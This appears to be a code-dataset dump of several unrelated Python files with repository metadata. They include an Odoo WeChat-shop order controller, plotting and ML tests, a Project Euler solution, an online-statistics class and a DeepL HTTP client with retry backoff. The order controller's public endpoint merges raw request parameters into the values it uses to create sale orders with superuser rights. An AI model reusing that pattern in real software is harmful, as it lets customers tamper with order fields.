'number_goods': sum(map(lambda r: r['product_uom_qty'], order_lines)),\n 'logistics_price': logistics_price,\n 'province_id': province_id,\n 'city_id': city_id,\n 'district_id': district_id,\n 'team_id': team_id and int(team_id) or entry.team_id.id,\n 'note': remark,\n 'linkman': link_man,\n 'partner_shipping_id': addr_id or wechat_user.partner_id.id,\n 'user_id': wechat_user.partner_id.user_id.id,\n 'goods_price': goods_price,\n 'extra': {},\n 'entry': entry,\n }\n order_dict.update(kwargs)\n if kwargs.get('extraInfo'):\n try:\n extraInfo = json.loads(kwargs.get('extraInfo'))\n order_dict.update(extraInfo)\n except:\n import traceback;traceback.print_exc()\n order_dict['_params'] = {'calculate': calculate, 'isNeedLogistics': isNeedLogistics}\n order_dict['_params'].update(kwargs)\n _logger.info('>>> order_dict %s', order_dict)\n order_logistics = self.calculate_order_logistics(wechat_user, order_dict, order_lines)\n if order_logistics!=None:\n order_dict['logistics_price'] = order_logistics\n self.after_calculate(wechat_user, order_dict, order_lines)\n\n if calculate:\n _data = {\n 'score': order_dict.get('need_score', 0),\n 'isNeedLogistics': isNeedLogistics,\n 'amountTotle': round(order_dict['goods_price'], 2),\n 'amountLogistics': order_dict['logistics_price'],\n 'amountTax': order_dict.get('amount_tax', 0),\n 'extra': order_dict['extra']\n }\n _data['amountReal'] = _data['amountTotle'] + _data['amountLogistics'] + _data['amountTax']\n _data.update(self.calculate_ext_info(wechat_user, order_dict, order_lines, _data))\n for line in order_lines:\n line['price_unit'] = round(line['price_unit'], 2)\n _data['orderLines'] = order_lines\n _data['amountReal'] = round(_data['amountReal'], 2)\n else:\n OrderModel = request.env(user=1)['sale.order']\n user = self._get_user()\n if user:\n if release.version_info[0]>=14:\n OrderModel = OrderModel.with_company(user.company_id.id)\n else:\n OrderModel = OrderModel.with_context(force_company=user.company_id.id)\n order_dict.pop('goods_price')\n order_dict.pop('extra')\n order_dict.pop('_params')\n line_value_list = []\n for line in order_lines:\n if 'goods_id' in line:\n line.pop('goods_id')\n line_value_list.append((0, 0, line))\n if order_dict['logistics_price']>0:\n line_value_list.append((0, 0, {\n 'product_id': 
request.env.ref('oejia_weshop.product_product_delivery_weshop').id,\n 'price_unit': order_dict['logistics_price'],\n 'product_uom_qty': 1,\n }))\n order_dict['order_line'] = line_value_list\n _logger.info('>>> create order_line %s', order_dict['order_line'])\n vals = order_dict.copy()\n vals.pop('entry', None)\n order = OrderModel.create(vals)\n\n #mail_template = request.env.ref('wechat_mall_order_create')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n if hasattr(order, 'action_accounted'):\n order.action_accounted(order_dict)\n order.action_created(order_dict)\n _data = {\n "amountReal": round(order.amount_total, 2),\n "dateAdd": dt_convert(order.create_date, gmt_diff=entry.gmt_diff),\n "id": order.id,\n "orderNumber": order.name,\n "customer": order.partner_id.name,\n "status": defs.OrderResponseStatus.attrs[order.customer_status],\n "statusStr": self.get_statusStr(order),\n }\n\n return self.res_ok(_data)\n\n except UserException as e:\n return self.res_err(-99, e.args[0])\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, '%s'%e)\n\n def calculate_order_logistics(self, wechat_user, order_dict, order_lines):\n pass\n\n def after_calculate(self, wechat_user, order_dict, order_lines):\n pass\n\n def calculate_ext_info(self, wechat_user, order_dict, goods_list, init_info):\n return {}\n\n def parse_goods_json(self, goods_json, province_id, city_id, district_id, calculate):\n """\n :param goods_json: dict\n :param province_id: province\n :param city_id: city\n :param district_id: district\n :return: goods_fee, logistics_fee, order_lines\n """\n # [{"goodsId":1,"number":3,"propertyChildIds":"1:1,2:4,","logisticsType":0, "inviter_id":0}]\n goods_fee, logistics_fee = 0.0, 0.0\n order_lines = []\n\n goods_id_set = set(map(lambda r: r['goodsId'], goods_json))\n product_list = []\n for data in goods_json:\n rs = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', data['goodsId']),\n ('attr_val_str', '=', data['propertyChildIds'])\n ])\n product_list += [p for p in rs]\n\n template_list = request.env['product.template'].sudo().search([\n ('id', 'in', list(goods_id_set)),\n ('wxapp_published', '=', True)\n ])\n template_dict = {template.id: template for template in template_list}\n\n if goods_id_set - set(template_dict.keys()):\n _ids = goods_id_set - set(template_dict.keys())\n _logger.info('>>> _ids %s', _ids)\n _name_list = [e.name for e in request.env['product.template'].sudo().search([('id', 'in', list(_ids))])]\n raise UserException(u'The order contains goods that are no longer available: %s' % ','.join(_name_list))\n\n isNeedLogistics = 0\n for each_goods in goods_json:\n property_child_ids = each_goods.get('propertyChildIds')\n amount = each_goods['number']\n transport_type = each_goods['logisticsType']\n template = template_dict[each_goods['goodsId']]\n if template.type=='product':\n isNeedLogistics = 1\n\n each_goods_total, line_dict = self.calculate_goods_fee(template, amount, property_child_ids, calculate)\n order_lines.append(line_dict)\n goods_fee += each_goods_total\n each_logistics_price = self.calculate_logistics_fee(template, amount, transport_type, province_id, city_id, district_id)\n logistics_fee += each_logistics_price\n\n return goods_fee, logistics_fee, order_lines, isNeedLogistics\n\n def calculate_goods_fee(self, goods, amount, property_child_ids, calculate):\n _logger.info('>>> calculate_goods_fee %s %s %s', goods, amount, property_child_ids)\n property_str = ''\n\n if 1:#property_child_ids:\n property_child_ids = 
property_child_ids or ''\n product = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', goods.id),\n ('attr_val_str', '=', property_child_ids)\n ])\n if not property_child_ids and not product:\n product = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', goods.id),\n ('attr_val_str', '=', False)\n ])\n if not product:\n raise UserException(u'Product does not exist!')\n\n price = product.get_present_price(amount)\n total = price * amount\n property_str = product.name\n\n stores = product.get_present_qty() - amount\n if not property_child_ids:\n stores = goods.get_present_qty() - amount\n\n if stores < 0:\n raise UserException(u'%s has insufficient stock!'%goods.name)\n if stores == 0:\n # todo: send out-of-stock warning\n pass\n if not calculate:\n product.sudo().change_qty(-amount)\n if not property_child_ids:\n goods.sudo().change_qty(-amount)\n\n line_dict = {\n 'product_id': product.id,\n 'goods_id': goods.id,\n 'price_unit': price,\n 'product_uom_qty': amount,\n }\n return total, line_dict\n\n def calculate_logistics_fee(self, goods, amount, transport_type, province_id, city_id, district_id):\n return 0\n\n def pre_check(self, entry, wechat_user, post_data):\n return\n\n\n @http.route('/wxa/<string:sub_domain>/order/statistics', auth='public', methods=['GET', 'POST'], csrf=False)\n def statistics(self, sub_domain, token=None, **kwargs):\n '''\n closed = ('closed', u'closed')\n unpaid = ('unpaid', u'awaiting payment')\n pending = ('pending', u'awaiting shipment')\n unconfirmed = ('unconfirmed', u'awaiting receipt')\n unevaluated = ('unevaluated', u'awaiting review')\n completed = ('completed', u'completed')\n '''\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n domain = self.get_orders_domain(None, **kwargs)\n orders = request.env['sale.order'].sudo().search(domain)\n order_statistics_dict = {order_status: 0 for order_status in defs.OrderStatus.attrs.keys()}\n for each_order in orders:\n order_statistics_dict[each_order.customer_status] += 1\n\n data = {\n "count_id_no_reputation": order_statistics_dict['unevaluated'],\n "count_id_no_transfer": order_statistics_dict['pending'],\n "count_id_close": order_statistics_dict['closed'],\n "count_id_no_pay": order_statistics_dict['unpaid'],\n "count_id_no_confirm": order_statistics_dict['unconfirmed'],\n "count_id_success": order_statistics_dict['completed']\n }\n return self.res_ok(data)\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n def clean_html(self, content):\n pattern = re.compile(r'<[^>]+>',re.S)\n result = pattern.sub('', content)\n return result\n\n def _order_basic_dict(self, each_order):\n ret = {\n "amountReal": round(each_order.amount_total, 2),\n "dateAdd": dt_convert(each_order.create_date, gmt_diff=self.cur_gmt_diff),\n "id": each_order.id,\n "remark": self.clean_html(each_order.note),\n "orderNumber": each_order.name,\n "goodsNumber": each_order.number_goods,\n "status": defs.OrderResponseStatus.attrs[each_order.customer_status],\n "statusStr": self.get_statusStr(each_order),\n "score": 0,\n }\n return ret\n\n def get_statusStr(self, order):\n return defs.OrderStatus.attrs[order.customer_status]\n\n def get_orders_domain(self, status, **kwargs):\n domain = [('partner_id', '=', request.wechat_user.partner_id.id), ('number_goods', '>', 0)]\n if status and status!='9' and status.isdigit():\n domain.append(('customer_status', '=', defs.OrderRequestStatus.attrs[int(status)]))\n return domain\n\n @http.route('/wxa/<string:sub_domain>/order/list', auth='public', methods=['GET', 'POST'], csrf=False)\n def list(self, 
sub_domain, token=None, status=None, **kwargs):\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n kwargs['entry'] = entry\n domain = self.get_orders_domain(status, **kwargs)\n orders = request.env['sale.order'].sudo().search(domain, order='id desc', limit=30)\n delivery_product_id = request.env.ref('oejia_weshop.product_product_delivery_weshop').id\n self.cur_gmt_diff = entry.gmt_diff\n data = {\n "logisticsMap": {},\n "orderList": [self._order_basic_dict(each_order) for each_order in orders],\n "goodsMap": {\n each_order.id: [\n {\n "pic": each_goods.product_id.product_tmpl_id.main_img,\n "number": each_goods.product_uom_qty,\n "name": each_goods.name,\n "price": each_goods.price_unit,\n "sku": each_goods.product_id.get_property_str(),\n "product_uom": each_goods.product_uom.name,\n "prodId": each_goods.product_id.product_tmpl_id.id,\n } for each_goods in each_order.order_line if each_goods.product_id.id!=delivery_product_id]\n for each_order in orders}\n }\n if not data['orderList']:\n return self.res_err(700)\n return self.res_ok(data)\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n @http.route('/wxa/<string:sub_domain>/order/detail', auth='public', methods=['GET'])\n def detail(self, sub_domain, token=None, id=None, **kwargs):\n order_id = id\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:\n if entry and kwargs.get('access_token'):\n pass\n else:\n return res\n\n if not order_id:\n return self.res_err(300)\n\n if kwargs.get('access_token'):\n order = request.env['sale.order'].sudo().search([\n ('access_token', '=', kwargs.get('access_token')),\n ('id', '=', int(order_id))\n ])\n if order:\n wechat_user = WechatUser(order.partner_id, request.env.user)\n else:\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n delivery_product_id = request.env.ref('oejia_weshop.product_product_delivery_weshop').id\n data = {\n "code": 0,\n "data": {\n "orderInfo": {\n "amount": order.goods_price,\n "amountLogistics": order.logistics_price,\n "amountTax": round(order.amount_tax, 2),\n "amountReal": round(order.amount_total, 2),\n "dateAdd": dt_convert(order.create_date, gmt_diff=entry.gmt_diff),\n "dateUpdate": dt_convert(order.write_date, gmt_diff=entry.gmt_diff),\n "goodsNumber": order.number_goods,\n "id": order.id,\n "orderNumber": order.name,\n "remark": self.clean_html(order.note),\n "status": defs.OrderResponseStatus.attrs[order.customer_status],\n "statusStr": defs.OrderStatus.attrs[order.customer_status],\n "type": 0,\n "uid": 1,#user.id,\n "userId": wechat_user.id,\n "portal_messages": [],\n },\n "goods": [\n {\n "amount": each_goods.price_unit,\n "goodsId": each_goods.product_id.product_tmpl_id.id,\n "goodsName": each_goods.name,\n "id": each_goods.product_id.id,\n "number": each_goods.product_uom_qty,\n "product_uom": each_goods.product_uom.name,\n "orderId": order.id,\n "pic": each_goods.product_id.product_tmpl_id.main_img,\n "property": each_goods.product_id.get_property_str(),\n "propertyChildIds": each_goods.product_id.attr_val_str,\n } for each_goods in order.order_line if each_goods.product_id.id!=delivery_product_id\n ],\n "logistics": {\n "address": order.address,\n "provinceId": order.province_id.id,\n "cityId": order.city_id.id,\n "districtId": order.district_id.id 
or 0,\n "provinceStr": order.province_id.name,\n "cityStr": order.city_id.name,\n "areaStr": order.district_id.name,\n "linkMan": order.linkman,\n "mobile": order.mobile,\n "code": order.zipcode,\n "shipperCode": order.shipper_id.code if order.shipper_id else '',\n "shipperName": order.shipper_id.name if order.shipper_id else '',\n "status": 0 if order.shipper_id else '',\n "trackingNumber": order.shipper_no if order.shipper_no else ''\n },\n },\n "msg": "success"\n }\n if order.shipper_no:\n self.build_traces(order, data)\n self.build_ext(order, data)\n order.get_detail_ext(data)\n\n return self.res_ok(data["data"])\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n def build_traces(self, order, data):\n pass\n\n def build_ext(self, order, data):\n pass\n\n @http.route('/wxa/<string:sub_domain>/order/close', auth='public', methods=['GET', 'POST'], csrf=False)\n def close(self, sub_domain, token=None, orderId=None, **kwargs):\n order_id = orderId\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n if not order_id:\n return self.res_err(300)\n\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n if order.state=='sale':\n return self.res_err(-99, u'This order has already been confirmed and cannot be cancelled')\n\n #order.write({'customer_status': 'closed'})\n order.action_cancel()\n\n #mail_template = request.env.ref('wechat_mall_order_closed')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n\n return self.res_ok()\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n @http.route('/wxa/<string:sub_domain>/order/delivery', auth='public', methods=['GET', 'POST'], csrf=False)\n def delivery(self, sub_domain, token=None, orderId=None, **kwargs):\n '''\n Endpoint for confirming receipt of goods\n '''\n order_id = orderId\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n if not order_id:\n return self.res_err(300)\n\n order = request.env['sale.order'].sudo().search([\n ('partner_id', '=', wechat_user.partner_id.id),\n ('id', '=', int(order_id))\n ])\n\n if not order:\n return self.res_err(404)\n\n order.action_receive()\n\n #mail_template = request.env.ref('wechat_mall_order_confirmed')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n\n return self.res_ok()\n\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, str(e))\n\n\n","repo_name":"JoneXiong/oejia_weshop","sub_path":"controllers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":23118,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"65"} +{"seq_id":"38725230908","text":"from unittest import TestCase, main\nimport pandas as pd\nfrom tempfile import gettempdir\nimport numpy as np\nfrom os import remove\nfrom os.path import join\n\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nfrom skbio.util import get_data_path\n\nfrom ggmap.snippets import (drawMap)\nfrom ggmap.imgdiff import compare_images\n\nplt.switch_backend('Agg')\nplt.rc('font', family='DejaVu Sans')\n\n\nclass ReadWriteTests(TestCase):\n def setUp(self):\n # set following var to True to generate a new set of baseline plots\n # without testing and aborting after too many differences\n self.mode_generate_baseline = False\n self.dpi = 80\n self.meta_basemap = pd.read_csv(get_data_path(
'drawMap/basemap.meta.tsv'), sep='\\t', index_col=0)\n self.basemap_alaska = Basemap(llcrnrlat=43.,\n llcrnrlon=168.,\n urcrnrlat=63.,\n urcrnrlon=-110,\n resolution='i',\n projection='cass',\n lat_0=90.0,\n lon_0=-155.0)\n\n self.meta_basemap_migration = pd.read_csv(\n get_data_path('drawMap/basemap.meta.migration.tsv'),\n sep='\\t', index_col=0)\n\n def tearDown(self):\n self.assertFalse(self.mode_generate_baseline)\n\n def help_compare_drawmap(self, name, fig):\n \"\"\" Helper function to compare drawMap images \"\"\"\n file_plotname = 'basemap.%s.png' % name\n file_dummy = join(gettempdir(), file_plotname)\n fig.set_size_inches(16, 11)\n fig.savefig(file_dummy, dpi=self.dpi)\n res = compare_images(get_data_path('drawMap/'+file_plotname),\n file_dummy,\n file_image_diff='./diff.'+file_plotname)\n plt.close(fig)\n if not self.mode_generate_baseline:\n if res[0] is True:\n remove(file_dummy)\n return res[0]\n\n def test_drawMap_alaska(self):\n # create plot\n contrast = 'Anas crecca'\n availcolors = ['blue', 'green', 'orange', 'magenta']\n li = []\n meta_others = self.meta_basemap[\n self.meta_basemap['smj_genusspecies'] != contrast]\n for i, (n, g) in enumerate(meta_others.groupby('Q2')):\n li.append({'label': \"%s: %i\" % (n, g.shape[0]),\n 'color': availcolors[i],\n 'alpha': 1,\n 'coords': g})\n anas = self.meta_basemap[\n self.meta_basemap.smj_genusspecies == contrast]\n li.append({'label': \"%s: %i\" % (anas.smj_genusspecies.unique()[0],\n anas.smj_genusspecies.shape[0]),\n 'color': availcolors[len(li)],\n 'coords': anas,\n 'size': 10})\n\n fig, ax = plt.subplots()\n drawMap(li, basemap=self.basemap_alaska, ax=ax)\n\n # compare image\n self.assertTrue(self.help_compare_drawmap('alaska', fig))\n\n def test_drawMap_migration(self):\n pn = 0\n meta_mig = self.meta_basemap_migration.groupby(['q1_route',\n 'q1_habitat'])\n fix, axarr = fig, ax = plt.subplots(4, 1)\n for pn, (n, g) in enumerate(meta_mig):\n li = [\n {'label': 'summer, with data',\n 'color': 'red',\n 'coords': g[(g['q1_season'] == 'summer') &\n (g['hasData'] == np.True_)],\n 'alpha': 1},\n {'label': 'winter, with data',\n 'color': 'blue',\n 'coords': g[(g['q1_season'] == 'winter') &\n (g['hasData'] == np.True_)],\n 'alpha': 1},\n ]\n li.append(\n {'label': 'summer, without data',\n 'color': 'orange',\n 'coords': g[(g['q1_season'] == 'summer')],\n 'alpha': 1})\n li.append(\n {'label': 'winter, without data',\n 'color': 'purple',\n 'coords': g[(g['q1_season'] == 'winter')],\n 'alpha': 1})\n drawMap(reversed(li), ax=axarr[pn], no_legend=pn < 3)\n axarr[pn].set_title(\"%s %s (winter n=%i->%i, summer n=%i->%i)\" % (\n \" | \".join(g.smj_genus.unique()),\n \" | \".join(g.smj_species.unique()),\n li[1]['coords'].shape[0] +\n li[3]['coords'].shape[0],\n li[1]['coords'].shape[0],\n li[0]['coords'].shape[0] +\n li[2]['coords'].shape[0],\n li[0]['coords'].shape[0]))\n\n # compare image\n self.assertTrue(self.help_compare_drawmap('migration', fig))\n\n def test_drawMap_default(self):\n li = [{'coords': self.meta_basemap_migration}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('default', fig))\n\n def test_drawMap_color(self):\n li = [{'coords': self.meta_basemap_migration,\n 'color': 'black'}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('color', fig))\n\n def test_drawMap_size(self):\n li = [{'coords': self.meta_basemap_migration,\n 'size': 200}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n 
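# image-regression check: the rendered map must match the stored baseline PNG\n 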
self.assertTrue(self.help_compare_drawmap('size', fig))\n\n def test_drawMap_alpha(self):\n li = [{'coords': self.meta_basemap_migration,\n 'alpha': 0.1}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('alpha', fig))\n\n def test_drawMap_label(self):\n li = [{'coords': self.meta_basemap_migration,\n 'label': 'Voegel'}]\n fig, ax = plt.subplots()\n drawMap(li, ax=ax)\n self.assertTrue(self.help_compare_drawmap('label', fig))\n\n def test_missing_coords(self):\n allcols = set(self.meta_basemap_migration.columns)\n with self.assertRaisesRegex(ValueError, '\"coords\" for every dict!'):\n drawMap([{'color': 'blue'}])\n\n with self.assertRaisesRegex(ValueError,\n 'need to have column \"latitude\"'):\n cols = allcols - set(['latitude'])\n drawMap([{'coords': self.meta_basemap_migration.loc[:, cols]}])\n\n with self.assertRaisesRegex(ValueError,\n 'need to have column \"longitude\"'):\n cols = allcols - set(['longitude'])\n drawMap([{'coords': self.meta_basemap_migration.loc[:, cols]}])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sjanssen2/ggmap","sub_path":"ggmap/test/test_snippets_drawmap.py","file_name":"test_snippets_drawmap.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"38651710526","text":"def solve():\n # 24: What is the nth permutation of the digits 0 through 9 when lexographically ordered\n # runtime: O(log n)\n # ans = 2783915460\n\n # we assume that n < (10!)\n n = 1_000_000\n\n d_scrambled = 1\n fac = 1\n while n > fac:\n d_scrambled += 1\n fac *= d_scrambled\n\n d_sorted = 10 - d_scrambled\n ans = \"0123456789\"[:d_sorted]\n rest = list(\"0123456789\"[d_sorted:])\n\n # need to switch to 0-indexing for convenience\n n -= 1\n for div in range(d_scrambled, 0, -1):\n fac //= div\n d, n = divmod(n, fac)\n ans += rest.pop(d)\n print(ans)\n","repo_name":"TemporarilyTired/projecteuler","sub_path":"0/20/p24.py","file_name":"p24.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"30472039152","text":"# -*- coding: utf-8 -*-\n\nfrom math import sqrt\n\n\nclass Statistics:\n \"\"\"\n Compute variance and standard deviation \"online\", that is, without needing\n all the values to be stored.\n\n A Python implementation of Welford's method as described here:\n https://www.johndcook.com/blog/standard_deviation/\n \"\"\"\n\n n = 0\n old_s = 0.0\n\n def __init__(self, initial=None):\n if initial:\n for x in initial:\n self.append(x)\n\n def append(self, x):\n self.n += 1\n if self.n == 1:\n self.old_m = x\n self.new_m = x\n else:\n self.new_m = self.old_m + (x - self.old_m) / self.n\n self.new_s = self.old_s + (x - self.old_m) * (x - self.new_m)\n self.old_m = self.new_m\n self.old_s = self.new_s\n\n def mean(self):\n if self.n == 0:\n raise ValueError('Mean is undefined')\n return self.new_m\n\n def variance(self):\n if self.n <= 1:\n raise ValueError('Variance is undefined')\n return self.new_s / (self.n - 1)\n\n def stdev(self):\n return sqrt(self.variance())\n","repo_name":"timb07/online_stats","sub_path":"online_stats/online_stats.py","file_name":"online_stats.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"32104204790","text":"# @Time : 2019/12/13 11:20\n# @Author : Libuda\n# @FileName: create_txt.py\n# @Software: 
PyCharm\n\n# @Time : 2019/12/13 11:12\n# @Author : Libuda\n# @FileName: create_txt.py\n# @Software: PyCharm\nimport os\n\ntrain_file_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\data\\re\\train\"\ntrain_res_txt_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\mylearn\\train.txt\"\n\ntest_file_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\data\\re\\test\"\ntest_res_txt_path = r\"C:\\Users\\lenovo\\PycharmProjects\\insightface\\mylearn\\test.txt\"\n\nwith open(train_res_txt_path, 'w') as f:\n print(123)\n for root, dir, files in os.walk(train_file_path):\n root = root.split(\"\\\\\")[-1]\n for file in files:\n label = str(int(int(file.split(\".\")[0]) / 100) - 3)\n tem = root + \"/\" + file\n print(tem)\n f.write(tem + \" \" + label + \"\\n\")\n","repo_name":"budaLi/leetcode-python-","sub_path":"图片过滤脚本/create_txt.py","file_name":"create_txt.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"65"} +{"seq_id":"33548441514","text":"import unittest\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom pytorch_adapt.hooks import ATDOCHook\nfrom pytorch_adapt.layers import ConfidenceWeights, NeighborhoodAggregation\n\n\ndef get_data(dataset_size, feature_dim, num_classes, batch_size):\n target_imgs_features = torch.randn(batch_size, feature_dim)\n target_imgs_features_logits = torch.randn(batch_size, num_classes)\n target_sample_idx = torch.randint(0, dataset_size, size=(batch_size,))\n\n return {\n \"target_imgs_features\": target_imgs_features,\n \"target_imgs_features_logits\": target_imgs_features_logits,\n \"target_sample_idx\": target_sample_idx,\n }\n\n\nclass TestATDOC(unittest.TestCase):\n def test_atdoc_hook(self):\n torch.manual_seed(922)\n dataset_size = 10000\n feature_dim = 128\n num_classes = 10\n batch_size = 64\n iters = 10\n\n seed = 545\n torch.manual_seed(seed)\n h = ATDOCHook(dataset_size, feature_dim, num_classes)\n all_losses = []\n for i in range(iters):\n data = get_data(dataset_size, feature_dim, num_classes, batch_size)\n outputs, losses = h(data)\n all_losses.append(losses[\"pseudo_label_loss\"])\n\n torch.manual_seed(seed)\n na = NeighborhoodAggregation(dataset_size, feature_dim, num_classes)\n all_correct_losses = []\n for i in range(iters):\n data = get_data(dataset_size, feature_dim, num_classes, batch_size)\n pseudo_labels, neighbor_preds = na(\n data[\"target_imgs_features\"],\n data[\"target_imgs_features_logits\"],\n update=True,\n idx=data[\"target_sample_idx\"],\n )\n loss = F.cross_entropy(\n data[\"target_imgs_features_logits\"], pseudo_labels, reduction=\"none\"\n )\n loss = torch.mean(loss * ConfidenceWeights()(neighbor_preds))\n all_correct_losses.append(loss)\n\n self.assertTrue(\n all(\n np.isclose(x, y.item(), rtol=1e-2)\n for x, y in zip(all_losses, all_correct_losses)\n )\n )\n","repo_name":"KevinMusgrave/pytorch-adapt","sub_path":"tests/hooks/test_atdoc.py","file_name":"test_atdoc.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"65"} +{"seq_id":"29405341240","text":"from . 
import version\nfrom .exceptions import ConnectionException\nimport http\nimport random\nimport requests\nimport time\nfrom typing import Optional, Tuple, Union\nfrom .util import log_info\n\n\nuser_agent = f\"deepl-python/{version.VERSION}\"\nmax_network_retries = 5\nmin_connection_timeout = 10.0\n\n\nclass _BackoffTimer:\n \"\"\"Implements exponential-backoff strategy.\n This strategy is based on the GRPC Connection Backoff Protocol:\n https://github.com/grpc/grpc/blob/master/doc/connection-backoff.md\"\"\"\n\n BACKOFF_INITIAL = 1.0\n BACKOFF_MAX = 120.0\n BACKOFF_JITTER = 0.23\n BACKOFF_MULTIPLIER = 1.6\n\n def __init__(self):\n self._num_retries = 0\n self._backoff = self.BACKOFF_INITIAL\n self._deadline = time.time() + self._backoff\n\n def get_num_retries(self):\n return self._num_retries\n\n def get_timeout(self):\n return max(self.get_time_until_deadline(), min_connection_timeout)\n\n def get_time_until_deadline(self):\n return max(self._deadline - time.time(), 0.0)\n\n def sleep_until_deadline(self):\n time.sleep(self.get_time_until_deadline())\n\n # Apply multiplier to current backoff time\n self._backoff = min(\n self._backoff * self.BACKOFF_MULTIPLIER, self.BACKOFF_MAX\n )\n\n # Get deadline by applying jitter as a proportion of backoff:\n # if jitter is 0.1, then multiply backoff by random value in [0.9, 1.1]\n self._deadline = time.time() + self._backoff * (\n 1 + self.BACKOFF_JITTER * random.uniform(-1, 1)\n )\n self._num_retries += 1\n\n\nclass HttpClient:\n def __init__(self):\n self._session = requests.Session()\n self._session.headers = {\"User-Agent\": user_agent}\n pass\n\n def close(self):\n self._session.close()\n\n def request_with_backoff(\n self, method: str, url: str, data: Optional[dict], **kwargs\n ) -> Tuple[int, Union[str, requests.Response]]:\n \"\"\"Makes API request, retrying if necessary, and returns response.\n\n Return and exceptions are the same as function request().\"\"\"\n backoff = _BackoffTimer()\n while True:\n response: Optional[Tuple[int, Union[str, requests.Response]]]\n try:\n response = self.request(\n method, url, data, timeout=backoff.get_timeout(), **kwargs\n )\n exception = None\n except Exception as e:\n response = None\n exception = e\n\n if not self._should_retry(\n response, exception, backoff.get_num_retries()\n ):\n if response is not None:\n return response\n else:\n raise exception\n\n if exception is not None:\n log_info(\n f\"Encountered a retryable-exception: {str(exception)}\"\n )\n\n log_info(\n f\"Starting retry {backoff.get_num_retries() + 1} for request {method} {url} \"\n f\"after sleeping for {backoff.get_time_until_deadline():.2f} seconds.\"\n )\n backoff.sleep_until_deadline()\n\n def request(\n self,\n method: str,\n url: str,\n data: Optional[dict],\n timeout: float,\n stream: bool = False,\n **kwargs,\n ) -> Tuple[int, Union[str, requests.Response]]:\n \"\"\"Makes API request and returns response content.\n\n Response is returned as HTTP status code and either content string (if\n stream is False) or response (if stream is True).\n\n If no response is received will raise ConnectionException.\"\"\"\n try:\n if stream:\n response = self._session.request(\n method,\n url,\n data=data,\n timeout=timeout,\n stream=True,\n **kwargs,\n )\n return response.status_code, response\n\n else:\n with self._session.request(\n method, url, data=data, timeout=timeout, **kwargs\n ) as response:\n response.encoding = \"UTF-8\"\n return response.status_code, response.text\n\n except (\n requests.exceptions.Timeout,\n 
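# transport-level failures; both are flagged as retryable below\r\n 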
requests.exceptions.ConnectionError,\r\n ):\r\n message = "Connection failed or request timed out."\r\n should_retry = True\r\n except (requests.exceptions.RequestException, Exception) as e:\r\n message = f"Unexpected connection error: {e}"\r\n should_retry = False\r\n\r\n raise ConnectionException(message, should_retry=should_retry)\r\n\r\n def _should_retry(self, response, exception, num_retries):\r\n if num_retries >= max_network_retries:\r\n return False\r\n\r\n if response is None:\r\n return exception.should_retry\r\n\r\n status_code, _ = response\r\n # Retry on Too-Many-Requests error and internal errors except\r\n # Service-Unavailable errors\r\n return status_code == http.HTTPStatus.TOO_MANY_REQUESTS or (\r\n status_code >= http.HTTPStatus.INTERNAL_SERVER_ERROR\r\n and status_code != http.HTTPStatus.SERVICE_UNAVAILABLE\r\n )\r\n","repo_name":"yamajackr/Kotonoha","sub_path":"Kotonoha/libs/deepl/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"7676801758","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PROGRAM_TO_ADD_DISEASES_TO_DATASET \n\n# # PROGRAM SHOULD BE ABLE TO PERFORM - \n# ## -> See Symptoms arranged ALPHABETICALLY\n# ## -> Search For Symptoms\n# ## -> Add Symptoms\n# ## -> Add Disease\n# ## -> Update Disease_Symptoms or Disease_Name or Symptom_Name\n# ## -> Delete DISEASE or 